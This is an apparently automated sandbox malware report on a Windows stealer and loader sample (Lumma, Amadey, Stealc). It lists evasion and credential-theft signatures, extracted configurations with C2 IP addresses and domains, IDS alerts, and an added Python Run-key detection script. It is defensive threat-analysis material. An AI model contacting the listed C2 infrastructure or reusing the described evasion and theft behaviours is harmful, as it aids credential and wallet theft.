Windows Analysis Report
h3yRbjNWk1.exe

Overview

General Information

Sample name: h3yRbjNWk1.exe
(renamed because the original name is a hash value)
Original sample name: 29c296c7b8335c9d6ee3215f5484c3e0.exe
Analysis ID: 1537094
MD5: 29c296c7b8335c9d6ee3215f5484c3e0
SHA1: c7c6db3624937daea2ba323c832ffcd4028b73a0
SHA256: 8b277787184b8ac7005df852203270a0808aca4b0d54f26e72fa3b1a2c478852
Tags: 32exe
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
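Two of the signatures above, "Creates multiple autostart registry keys" and "Sigma detected: New RUN Key Pointing to Suspicious Folder", reduce to a check over Run/RunOnce values: which executable a value points at, whether that path sits in a user-writable staging folder, and whether the same image is registered more than once. The Python below is an added example, not the Sigma rule itself and not code from the sandbox; the folder list only approximates the public rule and is an assumption, and REGISTRY_EVENTS is constructed from paths seen in this report (Amadey's skotes.exe under AppData\Local\Temp\abc3bc1985, the dropped 6a8d4317d4.exe) plus one benign control entry and one unrelated key.

```python
"""Run-key persistence triage over registry value events.

Added example, not from the report or the Sigma project. SUSPICIOUS_FOLDERS
approximates the public Sigma rule "New RUN Key Pointing to Suspicious Folder"
(assumption, not the rule's exact list); REGISTRY_EVENTS is constructed from
paths in this report plus a benign control entry and an unrelated key.
"""
import re
from collections import Counter

RUN_KEY_RE = re.compile(
    r"\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$", re.I)
SUSPICIOUS_FOLDERS = (            # assumption: approximation of the Sigma rule's list
    "\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\",
    "\\programdata\\", "\\windows\\temp\\", ":\\temp\\", "\\$recycle.bin\\",
    "\\users\\default\\", "%temp%", "%appdata%", "%localappdata%",
)
PROGRAM_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

REGISTRY_EVENTS = [  # constructed sample input (key, value name, value data)
    {"key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "skotes.exe", "data": r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"},
    {"key": r"HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run",
     "name": "skotes", "data": r'"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"'},
    {"key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "6a8d4317d4", "data": r"C:\Users\user\1000350002\6a8d4317d4.exe"},
    {"key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "SecurityHealth", "data": r"C:\Windows\system32\SecurityHealthSystray.exe"},
    {"key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "name": "Hidden", "data": "1"},
]


def image_path(data: str) -> str:
    """Executable path from a Run value: strip surrounding quotes and trailing arguments."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = re.match(r"(.+?\.exe)(?:\s|$)", data, re.I)
    return m.group(1) if m else data.split(" ")[0]


def is_run_key(key: str) -> bool:
    """True for HKCU/HKLM ...\\CurrentVersion\\Run and RunOnce (including Wow6432Node)."""
    return bool(RUN_KEY_RE.search(key))


def points_to_suspicious_folder(data: str) -> bool:
    """Sigma-style check: does the autostart image live in a temp/staging folder?"""
    path = image_path(data).lower()
    return any(folder in path for folder in SUSPICIOUS_FOLDERS)


def outside_program_dirs(data: str) -> bool:
    """Weaker analyst heuristic: image is not under Program Files or the Windows directory."""
    return not image_path(data).lower().startswith(PROGRAM_DIRS)


def triage(events: list) -> dict:
    """Flag Run/RunOnce values with a reason and list images registered more than once."""
    flagged, images = [], Counter()
    for ev in events:
        if not is_run_key(ev["key"]):
            continue                      # not an autostart location, ignore
        image = image_path(ev["data"])
        images[image.lower()] += 1        # same image under several keys = multiple autostarts
        reason = None
        if points_to_suspicious_folder(ev["data"]):
            reason = "sigma:run-key-suspicious-folder"
        elif outside_program_dirs(ev["data"]):
            reason = "heuristic:outside-program-dirs"
        if reason:
            flagged.append({"key": ev["key"], "name": ev["name"], "image": image, "reason": reason})
    multiple = sorted(img for img, n in images.items() if n > 1)
    return {"flagged": flagged, "multiple_autostart": multiple}


if __name__ == "__main__":
    result = triage(REGISTRY_EVENTS)
    for hit in result["flagged"]:
        print(f'{hit["reason"]:36} {hit["name"]:16} -> {hit["image"]}')
    print("registered more than once:", result["multiple_autostart"])
```

On the constructed input the two skotes.exe entries match the folder check and are also reported as the one image with multiple autostart keys; 6a8d4317d4.exe is caught only by the weaker heuristic, which is why that second tier is worth keeping alongside the Sigma-style match.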

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions before stealing further sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that can deliver additional payloads as EXE, DLL or PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth, Stealc is a non-resident stealer with flexible data collection settings whose development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: h3yRbjNWk1.exe Avira: detected
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\1000350002\6a8d4317d4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000000.00000002.1721238447.00000000007C1000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 15.0.num.exe.650000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: ea2c7beae0.exe.5744.7.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "studennotediw.store", "eaglepawnoy.store", "clearancek.site", "spirittunek.store", "bathdoomgaz.store", "mobbipenju.store", "dissapoiznw.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\1000350002\6a8d4317d4.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 44%
Source: h3yRbjNWk1.exe ReversingLabs: Detection: 44%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\1000350002\6a8d4317d4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: h3yRbjNWk1.exe Joe Sandbox ML: detected
Source: h3yRbjNWk1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49971 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50050 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 4af6eb3e1f.exe, 0000000C.00000003.2595479701.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730540172.0000000000312000.00000040.00000001.01000000.0000000B.sdmp
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: number of queries: 1770
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 7_2_00B799D0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B3D110
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B3D110
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 7_2_00B3FCA0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 7_2_00B40EEC
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B75700
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 7_2_00B46F91
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 7_2_00B349A0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 7_2_00B73920
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 7_2_00B4D961
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_00B442FC
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then jmp eax 7_2_00B41ACD
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then jmp eax 7_2_00B41A3C
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 7_2_00B35A50
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 7_2_00B74A40
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_00B43BE2
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 7_2_00B41BEE
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov ebp, eax 7_2_00B3A300
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 7_2_00B79B60
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B79CE0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 7_2_00B79CE0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 7_2_00B4B410
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 7_2_00B5C470
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_00B4D457
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_00B46536
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_00B59510
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 7_2_00B5FD10
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 7_2_00B3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 7_2_00B46EBF
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 7_2_00B36EA0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 7_2_00B41E93
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 7_2_00B46F91

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49782 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:58049 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:64331 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:58875 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:54579 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:57941 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:54334 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:55382 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49793
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49825 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:58232 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49855 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49856 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:50684 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:55608 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:50775 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:59545 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:52126 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49878 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:53913 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:57439 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49913 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53787 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:52039 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:56496 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:50607 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:57625 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49948 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49953 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:57965 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:56772 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:53116 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:63648 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:59869 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:61897 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49988 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:63891 -> 1.1.1.1:53
